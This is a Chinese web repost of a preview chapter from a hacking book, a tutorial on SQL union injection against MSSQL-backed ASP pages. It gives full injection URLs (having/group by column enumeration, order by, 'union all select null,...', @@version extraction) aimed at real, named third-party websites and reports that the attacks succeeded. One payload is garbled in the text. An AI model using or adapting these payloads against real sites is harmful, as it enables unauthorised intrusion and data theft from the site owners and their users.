试读章节--union注入技巧

冰的原点注:为了让更多的人公平公正的了解这本书,决定把试读的章节公开在网上!希望对大家对本书有一个正确的认识,呵呵!当然这只是其中的一节哦!

在注入的时候还有一些情况我们也经常碰到,那就是没有错误回显。除了一个个去猜或者利用时间差的方法来盲注外,还有一个好的技巧就是union联合查询了。可我最近发现union注入除了在和mysql搭配的时候极少出错外,和mssql搭配的时候问题就很多,如字段类型不匹配或者页面上没有可回显的内容。今天我们要解决的就是这两个问题。

但在这之前,我得提一下如何获得当前注入点的字段数。获得字段数的方法我知道的有三种,第一种就是利用having 1=1--逼出当前所的字段数,如
●http://www.kumhobuslines.co.kr/custom/Noti_02.asp?id=366%20having%201=1--●
有很多人利用这个方法暴得当前列名值,这样我们再利用group by 一行一行逼出所有字段数,如提交如下URL:
●http://www.kumhobuslines.co.kr/custom/Noti_02.asp?id=366%20group%20by%20khnotice.notice_id,khnotice.notice_idx,khnotice.name,khnotice.title,khnotice.writedate,khnotice.fromdate,

khnotice.todate,khnotice.filename,khnotice.tag,khnotice.readnum,khnotice.content%20having%201=1--●
返回如图1所示的信息。

图1

试读章节--union注入技巧

这里得到的错误不再是列名了,而是出现了类似“类型不匹配”的信息,再数一下,发现一共有十一个表,那么字段数当然就是11了。第二种利用的就是order by N的方式了,注意了,不一定非要order by 11返回正确order by 12返回错误就确定字段数是11。我这里的●order by 11●一样是返回错误,如图2。

图2

试读章节--union注入技巧

因此这里主要看返回的信息提示。而提交●order by 12●时的返回信息如图3。

图3

试读章节--union注入技巧

第三种方法就是●and 1=2 union select n1,n2……●这样的方法一个一个去试,是的,如果字段数一多再加上没有回显,这种方法是很没有意思的,但请不要忽略这种方法。我有一次碰到的就是不能order by,但利用这个方法依次猜到当前字段数。

字段数取得后接下来就是回显问题,如何让像MYSQL一样把数字显示在当前页面中呢。如上例中,我们会提交如下URL:
●http://www.kumhobuslines.co.kr/custom/Noti_02.asp?id=366%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11●
这是我们常用的手法,但得到结果如图4。

图4

试读章节--union注入技巧

这个时候怎么办?有十一个字段,我们怎么确定是哪一个字段类型不符呢?要一个一个的替换后再看回显吗?如果你够聪明,你会想到全部用null来替换,我们来试一下,提交如下URL:
●http://www.kumhobuslines.co.kr/custom/Noti_02.asp?id=366%20and%201=2%20union%20select%20null,null,null,null,null,null,null,null,null,null,null●
返回的信息如图5。

图5

试读章节--union注入技巧

这下你是不是惊呆了?什么?竟然连null都出错。

其实不是的,我们仔细看一下错误回显,提示的并非类型不匹配,有个关键性的字眼是“DISTINCT”。我们来到MSDN查一下union的用法(http://msdn.microsoft.com/zh-cn/events/bb399797.aspx),看一下官方的解释:

UNION
指定组合多个集合并将其作为单个集合返回。
ALL
指定组合多个集合并将其作为单个集合返回(包括重复项)。如果未指定,则从结果集合中删除重复项。

Union只能返加单个集合并且不包含重复项,而刚才看到的单词DISTINCT是“截然不同的”之意,显然我们这个注入语句后面包含了不同的结果集。这里要解决的就是不让其暴错了,而不是匹配的问题,但其参数ALL就可以解决。我们提交:
●http://www.kumhobuslines.co.kr/custom/Noti_02.asp?id=366%20and%201=2%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null●,原本问题就这么解决了,但新的问题又来了,如图6所示。

图6

试读章节--union注入技巧

问题又来了,这里我遇到的情况比较特殊吧。但这里提醒一点就是因为NULL可以匹配任意类型,而我们遇到的大多数都是数字和字符型 ,因此我们大可以用数字来一个一个的猜,而不用管这类错误,如我们把第一个1用NULL和用第二个2来用NULL来代替后发现返回的都是图6的错误,如图7。

图7

试读章节--union注入技巧

都是同一个类型的错误,我们不用管,继续用数字代替后面的NULL,到替换数字“4”的时候还是这样的错误,但当我把第五个NULL来用“5”代替的时候,我们想要的结果出现了,URL:
●http://www.kumhobuslines.co.kr/custom/Noti_02.asp?id=366%20and%201=2%20union%20all%20select%201,2,3,4,5,null,null,null,null,null,null●
如图8。

图8

试读章节--union注入技巧

就这样,一个非常怪的UNION注入完成了。

另外,如果字段数只有1个的话,我们大可不必去管是什么类型,当然也要配合union all了,我们可以直接进行查询,如:
●http://www.webdonline.com/fr/services/forums/inscription.asp?id=77%20and%201=2%20union%20all%20select%[email protected]@version●
得到结果如图9

图9

试读章节--union注入技巧

总之,union注入的时候要灵活,要根据错误来不断变化。以上算是对union注入的一点小总结吧,希望对大家有用

分类:默认分类 时间:2015-03-13 人气:1
本文关键词:
分享到:

相关文章

Copyright (C) quwantang.com, All Rights Reserved.

趣玩堂 版权所有 京ICP备15002868号

processed in 0.047 (s). 10 q(s)